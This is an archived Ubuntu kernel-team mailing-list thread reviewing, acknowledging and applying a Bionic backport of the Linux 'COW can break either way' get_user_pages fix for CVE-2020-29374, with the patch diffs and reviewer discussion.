> >   i = follow_hugetlb_page(mm, vma, pages, vmas,
> >   &start, &nr_pages, i,
> > - gup_flags, nonblocking);
> > + foll_flags, nonblocking);
> >   continue;
> >   }
> >   }
> > +
> > + if (should_force_cow_break(vma, foll_flags))
> > + foll_flags |= FOLL_WRITE;
> > +
> >  retry:
> >   /*
> >   * If we have a pending SIGKILL, don't keep faulting pages and
> > @@ -1796,6 +1811,10 @@ bool gup_fast_permitted(unsigned long start, int nr_pages, int write)
> >  /*
> >   * Like get_user_pages_fast() except it's IRQ-safe in that it won't fall back to
> >   * the regular GUP. It will only return non-negative values.
> > + *
> > + * Careful, careful! COW breaking can go either way, so a non-write
> > + * access can get ambiguous page results. If you call this function without
> > + * 'write' set, you'd better be sure that you're ok with that ambiguity.
> >   */
> >  int __get_user_pages_fast(unsigned long start, int nr_pages, int write,
> >    struct page **pages)
> > @@ -1823,6 +1842,12 @@ int __get_user_pages_fast(unsigned long start, int nr_pages, int write,
> >   *
> >   * We do not adopt an rcu_read_lock(.) here as we also want to
> >   * block IPIs that come from THPs splitting.
> > + *
> > + * NOTE! We allow read-only gup_fast() here, but you'd better be
> > + * careful about possible COW pages. You'll get _a_ COW page, but
> > + * not necessarily the one you intended to get depending on what
> > + * COW event happens after this. COW may break the page copy in a
> > + * random direction.
> >   */
> >  
> >   if (gup_fast_permitted(start, nr_pages, write)) {
> > @@ -1868,9 +1893,16 @@ int get_user_pages_fast(unsigned long start, int nr_pages, int write,
> >   (void __user *)start, len)))
> >   return -EFAULT;
> >  
> > + /*
> > + * The FAST_GUP case requires FOLL_WRITE even for pure reads,
> > + * because get_user_pages() may need to cause an early COW in
> > + * order to avoid confusing the normal COW routines. So only
> > + * targets that are already writable are safe to do by just
> > + * looking at the page tables.
> > + */
> >   if (gup_fast_permitted(start, nr_pages, write)) {
> >   local_irq_disable();
> > - gup_pgd_range(addr, end, write, pages, &nr);
> > + gup_pgd_range(addr, end, 1, pages, &nr);
> >   local_irq_enable();
> >   ret = nr;
> >   }
> > diff --git a/mm/huge_memory.c b/mm/huge_memory.c
> > index b0a6ba0833e4..9f8fbb504d15 100644
> > --- a/mm/huge_memory.c
> > +++ b/mm/huge_memory.c
> > @@ -1425,13 +1425,12 @@ int do_huge_pmd_wp_page(struct vm_fault *vmf, pmd_t orig_pmd)
> >  }
> >  
> >  /*
> > - * FOLL_FORCE can write to even unwritable pmd's, but only
> > - * after we've gone through a COW cycle and they are dirty.
> > + * FOLL_FORCE or a forced COW break can write even to unwritable pmd's,
> > + * but only after we've gone through a COW cycle and they are dirty.
> >   */
> >  static inline bool can_follow_write_pmd(pmd_t pmd, unsigned int flags)
> >  {
> > - return pmd_write(pmd) ||
> > -       ((flags & FOLL_FORCE) && (flags & FOLL_COW) && pmd_dirty(pmd));
> > + return pmd_write(pmd) || ((flags & FOLL_COW) && pmd_dirty(pmd));
>
> The comment above this function mentions FOLL_FORCE, but I see it
> removed here. Is that removal intentional?

Yep, that comes from the upstream code.

Cascardo.

>
> William Breathitt Gray
>
> >  }
> >  
> >  struct page *follow_trans_huge_pmd(struct vm_area_struct *vma,
> > --
> > 2.27.0
> >
> >
> > --
> > kernel-team mailing list
> > [hidden email]
> > https://lists.ubuntu.com/mailman/listinfo/kernel-team



--
kernel-team mailing list
[hidden email]
https://lists.ubuntu.com/mailman/listinfo/kernel-team
Reply | Threaded
Open this post in threaded view
|

ACK: [SRU Bionic 0/1] CVE-2020-29374

Kamal Mostafa-2
In reply to this post by Thadeu Lima de Souza Cascardo-3
LGTM.

Acked-by: Kamal Mostafa <[hidden email]>

 -Kamal

On Wed, Dec 16, 2020 at 10:25:56PM -0300, Thadeu Lima de Souza Cascardo wrote:

> [Impact]
> A child process can read CoW data from a parent. This is the first part of the
> writeup at https://bugs.chromium.org/p/project-zero/issues/detail?id=2045.
>
> [Test case]
> The code at the Project Zero writeup was the one tested. It was adapted so the
> shared data was read at the child before doing get_user_pages_fast, so the fast
> path would be taken and the fast path on s390x could be tested.
>
> [Backport]
> There were conflicts that were fixed, and FOLL_PIN does not exist on bionic.
> Also, s390x is the only architecture that matters to us that still had its own
> GUPF implementation at 4.15. So, it needed to carry a fix of its own based on
> the generic one.
>
> [Potential regression]
> This could break users of GUP and hugepages.
>
> Linus Torvalds (1):
>   gup: document and work around "COW can break either way" issue
>
>  arch/s390/mm/gup.c                      |  9 ++++-
>  drivers/gpu/drm/i915/i915_gem_userptr.c |  8 +++++
>  mm/gup.c                                | 44 +++++++++++++++++++++----
>  mm/huge_memory.c                        |  7 ++--
>  4 files changed, 57 insertions(+), 11 deletions(-)
>
> --
> 2.27.0
>
>
> --
> kernel-team mailing list
> [hidden email]
> https://lists.ubuntu.com/mailman/listinfo/kernel-team

--
kernel-team mailing list
[hidden email]
https://lists.ubuntu.com/mailman/listinfo/kernel-team
Reply | Threaded
Open this post in threaded view
|

ACK: [SRU Bionic 1/1] gup: document and work around "COW can break either way" issue

William Breathitt Gray
In reply to this post by Thadeu Lima de Souza Cascardo-3
On Thu, Jan 21, 2021 at 05:40:10PM -0300, Thadeu Lima de Souza Cascardo wrote:

> On Wed, Jan 13, 2021 at 05:54:06AM -0500, William Breathitt Gray wrote:
> > On Wed, Dec 16, 2020 at 10:25:57PM -0300, Thadeu Lima de Souza Cascardo wrote:
> > > From: Linus Torvalds <[hidden email]>
> > >
> > > Doing a "get_user_pages()" on a copy-on-write page for reading can be
> > > ambiguous: the page can be COW'ed at any time afterwards, and the
> > > direction of a COW event isn't defined.
> > >
> > > Yes, whoever writes to it will generally do the COW, but if the thread
> > > that did the get_user_pages() unmapped the page before the write (and
> > > that could happen due to memory pressure in addition to any outright
> > > action), the writer could also just take over the old page instead.
> > >
> > > End result: the get_user_pages() call might result in a page pointer
> > > that is no longer associated with the original VM, and is associated
> > > with - and controlled by - another VM having taken it over instead.
> > >
> > > So when doing a get_user_pages() on a COW mapping, the only really safe
> > > thing to do would be to break the COW when getting the page, even when
> > > only getting it for reading.
> > >
> > > At the same time, some users simply don't even care.
> > >
> > > For example, the perf code wants to look up the page not because it
> > > cares about the page, but because the code simply wants to look up the
> > > physical address of the access for informational purposes, and doesn't
> > > really care about races when a page might be unmapped and remapped
> > > elsewhere.
> > >
> > > This adds logic to force a COW event by setting FOLL_WRITE on any
> > > copy-on-write mapping when FOLL_GET (or FOLL_PIN) is used to get a page
> > > pointer as a result.
> > >
> > > The current semantics end up being:
> > >
> > >  - __get_user_pages_fast(): no change. If you don't ask for a write,
> > >    you won't break COW. You'd better know what you're doing.
> > >
> > >  - get_user_pages_fast(): the fast-case "look it up in the page tables
> > >    without anything getting mmap_sem" now refuses to follow a read-only
> > >    page, since it might need COW breaking.  Which happens in the slow
> > >    path - the fast path doesn't know if the memory might be COW or not.
> > >
> > >  - get_user_pages() (including the slow-path fallback for gup_fast()):
> > >    for a COW mapping, turn on FOLL_WRITE for FOLL_GET/FOLL_PIN, with
> > >    very similar semantics to FOLL_FORCE.
> > >
> > > If it turns out that we want finer granularity (ie "only break COW when
> > > it might actually matter" - things like the zero page are special and
> > > don't need to be broken) we might need to push these semantics deeper
> > > into the lookup fault path.  So if people care enough, it's possible
> > > that we might end up adding a new internal FOLL_BREAK_COW flag to go
> > > with the internal FOLL_COW flag we already have for tracking "I had a
> > > COW".
> > >
> > > Alternatively, if it turns out that different callers might want to
> > > explicitly control the forced COW break behavior, we might even want to
> > > make such a flag visible to the users of get_user_pages() instead of
> > > using the above default semantics.
> > >
> > > But for now, this is mostly commentary on the issue (this commit message
> > > being a lot bigger than the patch, and that patch in turn is almost all
> > > comments), with that minimal "enable COW breaking early" logic using the
> > > existing FOLL_WRITE behavior.
> > >
> > > [ It might be worth noting that we've always had this ambiguity, and it
> > >   could arguably be seen as a user-space issue.
> > >
> > >   You only get private COW mappings that could break either way in
> > >   situations where user space is doing cooperative things (ie fork()
> > >   before an execve() etc), but it _is_ surprising and very subtle, and
> > >   fork() is supposed to give you independent address spaces.
> > >
> > >   So let's treat this as a kernel issue and make the semantics of
> > >   get_user_pages() easier to understand. Note that obviously a true
> > >   shared mapping will still get a page that can change under us, so this
> > >   does _not_ mean that get_user_pages() somehow returns any "stable"
> > >   page ]
> > >
> > > Reported-by: Jann Horn <[hidden email]>
> > > Tested-by: Christoph Hellwig <[hidden email]>
> > > Acked-by: Oleg Nesterov <[hidden email]>
> > > Acked-by: Kirill Shutemov <[hidden email]>
> > > Acked-by: Jan Kara <[hidden email]>
> > > Cc: Andrea Arcangeli <[hidden email]>
> > > Cc: Matthew Wilcox <[hidden email]>
> > > Signed-off-by: Linus Torvalds <[hidden email]>
> > > (backported from commit 17839856fd588f4ab6b789f482ed3ffd7c403e1f)
> > > [cascardo: fixed conflict due to missing commit ad415db817964e96df824e8bb1a861527f8012b6]
> > > [cascardo: fixed conflict due to missing commit b798bec4741bdd80224214fdd004c8e52698e425]
> > > [cascardo: fixed minor conflict on __get_user_pages_fast comment]
> > > [cascardo: fixup for absence of FOLL_PIN]
> > > [cascardo: use write=1 on s390's get_user_pages_fast too]
> > > CVE-2020-29374
> > > Signed-off-by: Thadeu Lima de Souza Cascardo <[hidden email]>
> > > ---
> > >  arch/s390/mm/gup.c                      |  9 ++++-
> > >  drivers/gpu/drm/i915/i915_gem_userptr.c |  8 +++++
> > >  mm/gup.c                                | 44 +++++++++++++++++++++----
> > >  mm/huge_memory.c                        |  7 ++--
> > >  4 files changed, 57 insertions(+), 11 deletions(-)
> > >
> > > diff --git a/arch/s390/mm/gup.c b/arch/s390/mm/gup.c
> > > index 9bce54eac0b0..713cf80a740e 100644
> > > --- a/arch/s390/mm/gup.c
> > > +++ b/arch/s390/mm/gup.c
> > > @@ -283,9 +283,16 @@ int get_user_pages_fast(unsigned long start, int nr_pages, int write,
> > >  {
> > >   int nr, ret;
> > >  
> > > + /*
> > > + * The FAST_GUP case requires FOLL_WRITE even for pure reads,
> > > + * because get_user_pages() may need to cause an early COW in
> > > + * order to avoid confusing the normal COW routines. So only
> > > + * targets that are already writable are safe to do by just
> > > + * looking at the page tables.
> > > + */
> > >   might_sleep();
> > >   start &= PAGE_MASK;
> > > - nr = __get_user_pages_fast(start, nr_pages, write, pages);
> > > + nr = __get_user_pages_fast(start, nr_pages, 1, pages);
> > >   if (nr == nr_pages)
> > >   return nr;
> > >  
> > > diff --git a/drivers/gpu/drm/i915/i915_gem_userptr.c b/drivers/gpu/drm/i915/i915_gem_userptr.c
> > > index f1bd66b5f006..d87beef8ceb3 100644
> > > --- a/drivers/gpu/drm/i915/i915_gem_userptr.c
> > > +++ b/drivers/gpu/drm/i915/i915_gem_userptr.c
> > > @@ -640,6 +640,14 @@ static int i915_gem_userptr_get_pages(struct drm_i915_gem_object *obj)
> > >        GFP_KERNEL |
> > >        __GFP_NORETRY |
> > >        __GFP_NOWARN);
> > > + /*
> > > + * Using __get_user_pages_fast() with a read-only
> > > + * access is questionable. A read-only page may be
> > > + * COW-broken, and then this might end up giving
> > > + * the wrong side of the COW..
> > > + *
> > > + * We may or may not care.
> > > + */
> > >   if (pvec) /* defer to worker if malloc fails */
> > >   pinned = __get_user_pages_fast(obj->userptr.ptr,
> > >         num_pages,
> > > diff --git a/mm/gup.c b/mm/gup.c
> > > index 12b9626b1a9e..ebf4a3482dee 100644
> > > --- a/mm/gup.c
> > > +++ b/mm/gup.c
> > > @@ -61,13 +61,22 @@ static int follow_pfn_pte(struct vm_area_struct *vma, unsigned long address,
> > >  }
> > >  
> > >  /*
> > > - * FOLL_FORCE can write to even unwritable pte's, but only
> > > - * after we've gone through a COW cycle and they are dirty.
> > > + * FOLL_FORCE or a forced COW break can write even to unwritable pte's,
> > > + * but only after we've gone through a COW cycle and they are dirty.
> > >   */
> > >  static inline bool can_follow_write_pte(pte_t pte, unsigned int flags)
> > >  {
> > > - return pte_write(pte) ||
> > > - ((flags & FOLL_FORCE) && (flags & FOLL_COW) && pte_dirty(pte));
> > > + return pte_write(pte) || ((flags & FOLL_COW) && pte_dirty(pte));
> > > +}
> > > +
> > > +/*
> > > + * A (separate) COW fault might break the page the other way and
> > > + * get_user_pages() would return the page from what is now the wrong
> > > + * VM. So we need to force a COW break at GUP time even for reads.
> > > + */
> > > +static inline bool should_force_cow_break(struct vm_area_struct *vma, unsigned int flags)
> > > +{
> > > + return is_cow_mapping(vma->vm_flags) && (flags & (FOLL_GET));
> > >  }
> > >  
> > >  static struct page *follow_page_pte(struct vm_area_struct *vma,
> > > @@ -694,12 +703,18 @@ static long __get_user_pages(struct task_struct *tsk, struct mm_struct *mm,
> > >   if (!vma || check_vma_flags(vma, gup_flags))
> > >   return i ? : -EFAULT;
> > >   if (is_vm_hugetlb_page(vma)) {
> > > + if (should_force_cow_break(vma, foll_flags))
> > > + foll_flags |= FOLL_WRITE;
> > >   i = follow_hugetlb_page(mm, vma, pages, vmas,
> > >   &start, &nr_pages, i,
> > > - gup_flags, nonblocking);
> > > + foll_flags, nonblocking);
> > >   continue;
> > >   }
> > >   }
> > > +
> > > + if (should_force_cow_break(vma, foll_flags))
> > > + foll_flags |= FOLL_WRITE;
> > > +
> > >  retry:
> > >   /*
> > >   * If we have a pending SIGKILL, don't keep faulting pages and
> > > @@ -1796,6 +1811,10 @@ bool gup_fast_permitted(unsigned long start, int nr_pages, int write)
> > >  /*
> > >   * Like get_user_pages_fast() except it's IRQ-safe in that it won't fall back to
> > >   * the regular GUP. It will only return non-negative values.
> > > + *
> > > + * Careful, careful! COW breaking can go either way, so a non-write
> > > + * access can get ambiguous page results. If you call this function without
> > > + * 'write' set, you'd better be sure that you're ok with that ambiguity.
> > >   */
> > >  int __get_user_pages_fast(unsigned long start, int nr_pages, int write,
> > >    struct page **pages)
> > > @@ -1823,6 +1842,12 @@ int __get_user_pages_fast(unsigned long start, int nr_pages, int write,
> > >   *
> > >   * We do not adopt an rcu_read_lock(.) here as we also want to
> > >   * block IPIs that come from THPs splitting.
> > > + *
> > > + * NOTE! We allow read-only gup_fast() here, but you'd better be
> > > + * careful about possible COW pages. You'll get _a_ COW page, but
> > > + * not necessarily the one you intended to get depending on what
> > > + * COW event happens after this. COW may break the page copy in a
> > > + * random direction.
> > >   */
> > >  
> > >   if (gup_fast_permitted(start, nr_pages, write)) {
> > > @@ -1868,9 +1893,16 @@ int get_user_pages_fast(unsigned long start, int nr_pages, int write,
> > >   (void __user *)start, len)))
> > >   return -EFAULT;
> > >  
> > > + /*
> > > + * The FAST_GUP case requires FOLL_WRITE even for pure reads,
> > > + * because get_user_pages() may need to cause an early COW in
> > > + * order to avoid confusing the normal COW routines. So only
> > > + * targets that are already writable are safe to do by just
> > > + * looking at the page tables.
> > > + */
> > >   if (gup_fast_permitted(start, nr_pages, write)) {
> > >   local_irq_disable();
> > > - gup_pgd_range(addr, end, write, pages, &nr);
> > > + gup_pgd_range(addr, end, 1, pages, &nr);
> > >   local_irq_enable();
> > >   ret = nr;
> > >   }
> > > diff --git a/mm/huge_memory.c b/mm/huge_memory.c
> > > index b0a6ba0833e4..9f8fbb504d15 100644
> > > --- a/mm/huge_memory.c
> > > +++ b/mm/huge_memory.c
> > > @@ -1425,13 +1425,12 @@ int do_huge_pmd_wp_page(struct vm_fault *vmf, pmd_t orig_pmd)
> > >  }
> > >  
> > >  /*
> > > - * FOLL_FORCE can write to even unwritable pmd's, but only
> > > - * after we've gone through a COW cycle and they are dirty.
> > > + * FOLL_FORCE or a forced COW break can write even to unwritable pmd's,
> > > + * but only after we've gone through a COW cycle and they are dirty.
> > >   */
> > >  static inline bool can_follow_write_pmd(pmd_t pmd, unsigned int flags)
> > >  {
> > > - return pmd_write(pmd) ||
> > > -       ((flags & FOLL_FORCE) && (flags & FOLL_COW) && pmd_dirty(pmd));
> > > + return pmd_write(pmd) || ((flags & FOLL_COW) && pmd_dirty(pmd));
> >
> > The comment above this function mentions FOLL_FORCE, but I see it
> > removed here. Is that removal intentional?
>
> Yep, that comes from the upstream code.
>
> Cascardo.
You're right, upstream patch removes this.

Acked-by: William Breathitt Gray <[hidden email]>

>
> >
> > William Breathitt Gray
> >
> > >  }
> > >  
> > >  struct page *follow_trans_huge_pmd(struct vm_area_struct *vma,
> > > --
> > > 2.27.0
> > >
> > >
> > > --
> > > kernel-team mailing list
> > > [hidden email]
> > > https://lists.ubuntu.com/mailman/listinfo/kernel-team
>
>

--
kernel-team mailing list
[hidden email]
https://lists.ubuntu.com/mailman/listinfo/kernel-team

signature.asc (849 bytes) Download Attachment
Reply | Threaded
Open this post in threaded view
|

APPLIED: [SRU Bionic 0/1] CVE-2020-29374

Kelsey Skunberg
In reply to this post by Thadeu Lima de Souza Cascardo-3
Applied to Bionic/master-next. thank you!

-Kelsey

On 2020-12-16 22:25:56 , Thadeu Lima de Souza Cascardo wrote:

> [Impact]
> A child process can read CoW data from a parent. This is the first part of the
> writeup at https://bugs.chromium.org/p/project-zero/issues/detail?id=2045.
>
> [Test case]
> The code at the Project Zero writeup was the one tested. It was adapted so the
> shared data was read at the child before doing get_user_pages_fast, so the fast
> path would be taken and the fast path on s390x could be tested.
>
> [Backport]
> There were conflicts that were fixed, and FOLL_PIN does not exist on bionic.
> Also, s390x is the only architecture that matters to us that still had its own
> GUPF implementation at 4.15. So, it needed to carry a fix of its own based on
> the generic one.
>
> [Potential regression]
> This could break users of GUP and hugepages.
>
> Linus Torvalds (1):
>   gup: document and work around "COW can break either way" issue
>
>  arch/s390/mm/gup.c                      |  9 ++++-
>  drivers/gpu/drm/i915/i915_gem_userptr.c |  8 +++++
>  mm/gup.c                                | 44 +++++++++++++++++++++----
>  mm/huge_memory.c                        |  7 ++--
>  4 files changed, 57 insertions(+), 11 deletions(-)
>
> --
> 2.27.0
>
>
> --
> kernel-team mailing list
> [hidden email]
> https://lists.ubuntu.com/mailman/listinfo/kernel-team

--
kernel-team mailing list
[hidden email]
https://lists.ubuntu.com/mailman/listinfo/kernel-team